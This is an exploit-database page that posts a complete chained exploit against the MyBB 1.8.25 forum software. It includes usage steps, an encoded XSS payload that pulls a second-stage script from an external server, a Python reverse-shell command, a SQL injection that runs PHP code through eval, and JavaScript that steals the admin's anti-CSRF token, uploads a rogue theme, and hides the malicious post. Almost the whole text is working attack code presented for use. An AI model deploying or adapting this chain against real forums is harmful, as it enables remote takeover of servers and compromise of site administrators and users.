0day.today - Biggest Exploit Database in the World.
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn
GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Contact us
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
MyBB 1.8.25 - Chained Remote Command Execution Exploit
Author
Risk
[Security Risk Critical
]0day-ID
Category
Date add
CVE
Platform
# Exploit Title: MyBB 1.8.25 - Chained Remote Command Execution
# Exploit Author: SivertPL (kroppoloe@protonmail.ch)
# Description: Nested autourl Stored XSS -> templateset second order SQL Injection leading to RCE through improper string interpolation in eval().
# Software Link: https://resources.mybb.com/downloads/mybb_1825.zip
# CVE: CVE-2021-27889, CVE-2021-27890
Reference: https://portswigger.net/daily-swig/chained-vulnerabilities-used-to-take-control-of-mybb-forums
The exploit requires the target administrator to have a valid ACP session.
Proof of Concept Video: https://www.youtube.com/watch?v=xU1Y9_bgoFQ
Guide:
1) In order to escape various checks, the XSS has to download this .js file from an external server, and then execute it.
Please replace the source of the following script node with an URL pointing to the second stage .js file (this file) to be downloaded by the target.
document.write('<script src=http://localhost:8000/second_stage.js></script>');
2) Please encode the aforementioned JS payload with String.fromCharCode, to achieve constraint-less JavaScript execution environment.
You can use this website: https://eve.gd/2007/05/23/string-fromcharcode-encoder/
3) Put the resulting encoded payload in the nested autourl vulnerability vector:
[img]http://xyzsomething.com/image?)http://x.com/onerror=<FCC ENCODED PAYLOAD>;//[/img]
4) The final payload should look like this:
[img]http://xyzsomething.com/image?)http://x.com/onerror=eval(String.fromCharCode(100,111,99,117,109,101,110,116,46,119,114,105,116,101,40,39,60,115,99,114,105,112,116,32,115,114,99,61,104,116,116,112,58,47,47,108,111,99,97,108,104,111,115,116,58,56,48,48,48,47,119,111,114,109,46,106,115,62,60,47,115,99,114,105,112,116,62,39,41,59));//[/img]
5) Send the full vector to the target, either by private message, a post, or any other place where MyCode (BBCode) is supported.
Once the target's browser renders the page, the XSS vulnerability will fire and download & execute the second stage payload from the website specified above, using document.write() to 'bypass' SOP.
After the execution of the payload, you should receive a reverse shell, provided the admin has a valid ACP session.
6) Enjoy your RCE! For educational purposes only.
*/
constREVERSE_SHELL_IP = "localhost";
constREVERSE_SHELL_PORT = 5554;
constPAYLOAD_XML_NAME = "payload";
constPAYLOAD_XML_VERSION = "1821";
constXML_PROLOG = "<?xml version=\"1.0\" encoding=\"UTF-8\"?>";
constSHELL_PAYLOAD = "python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"" + REVERSE_SHELL_IP + "\"," + REVERSE_SHELL_PORT + "));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'"
constSQL_PAYLOAD = "') AND 1=0 UNION SELECT title, '${passthru(base64_decode(\\'" + btoa(SHELL_PAYLOAD) + "\\'))}' from mybb_templates -- ";
// Trigger the actual vulnerability, force cache reload.
// Stage: Final
functiontrigger() {
varrequest = newXMLHttpRequest();
request.open('GET', '/index.php');
request.send();
}
// Poison the cache.
// Stage: 6
functionset_as_default(token, tid) {
varrequest = newXMLHttpRequest();
request.open('GET', '/admin/index.php?module=style-themes&action=set_default&tid=' + tid + '&my_post_key=' + token);
request.onload = function() { trigger(); };
request.send();
}
// Get the TID of the downloaded theme payload
// Stage: 5
functionget_payload_tid(token) {
varrequest = newXMLHttpRequest();
request.open('GET', '/admin/index.php?module=style-themes');
request.responseType = "document";
request.onload = function() {
varresponse = request.response;
varaTags = response.getElementsByTagName("a");
varsearchText = "payload";
varfound;
for (vari = 0; i < aTags.length; i++) {
if (aTags[i].textContent == searchText) {
found = aTags[i];
break;
}
}
varhref = found.getAttribute("href");
varurlParams = newURLSearchParams(href);
vartid = urlParams.get("tid");
set_as_default(token, tid);
};
request.send();
}
// We pass the actual request to upload the template exploiting the second link of the exploit chain
// Stage: 4
functionupload_template(token) {
varrequest = newXMLHttpRequest();
request.open('POST', '/admin/index.php?module=style-themes&action=import');
vardata = newFormData();
data.append('my_post_key', token);
data.append('local_file', build_payload(), PAYLOAD_XML_NAME + ".xml");
data.append('import', 0);
data.append('url', '');
data.append('tid', '1');
data.append('name', "payload");
data.append("version_compat", 1);
data.append("import_stylesheets", 1);
data.append("import_templates", 1);
request.onload = function() {
// After uploading the template, set it as default to poison the cache
get_payload_tid(token)
};
request.send(data);
}
// Build the rogue XML Template exploiting SQL Injection leading to RCE through PHP evaluation.
// Stage: 3
functionbuild_payload() {
varxmlDom = document.implementation.createDocument("", "", null);
vartheme = xmlDom.createElement("theme");
theme.setAttribute("name", PAYLOAD_XML_NAME);
theme.setAttribute("version", PAYLOAD_XML_VERSION);
varproperties = xmlDom.createElement("properties");
theme.appendChild(properties);
vartemplate_set = xmlDom.createElement("templateset");
template_set.innerHTML = SQL_PAYLOAD;
properties.appendChild(template_set);
xmlDom.appendChild(theme);
varserialized = newXMLSerializer().serializeToString(xmlDom);
varresult = XML_PROLOG + serialized;
varfile = newFile([result], PAYLOAD_XML_NAME);
returnfile;
}
// Acquire the anti-CSRF token
// Stage: 2
functionacquire_token(request) {
varresponse = request.response;
vartoken = response.getElementsByName("my_post_key")[0].value;
if(token == null) {
/* ACP Session either expired or wasn't established to begin with */
return;
}
// We have acquired the anti-CSRF token now.
upload_template(token);
}
// ACP Code Execution
// Stage: 1
functionexec_acp() {
varrequest = newXMLHttpRequest();
request.open('GET', 'admin/index.php?module=style-themes&action=import');
request.responseType = "document";
request.onload = function() {
acquire_token(request);
};
request.send();
}
// We hide the payload, to raise less suspicions
// Stage: 0
functionhide() {
vargetAll = document.querySelectorAll("[src*='http://xyzsomething.com/image?)<a href=']");
getAll.forEach(element=> {
varpNode = element.parentNode.innerText="lmao whatever you say";
});
}
// Entry point of the exploit
functionstart() {
hide();
exec_acp();
}
start();
# 0day.today [2024-11-15] #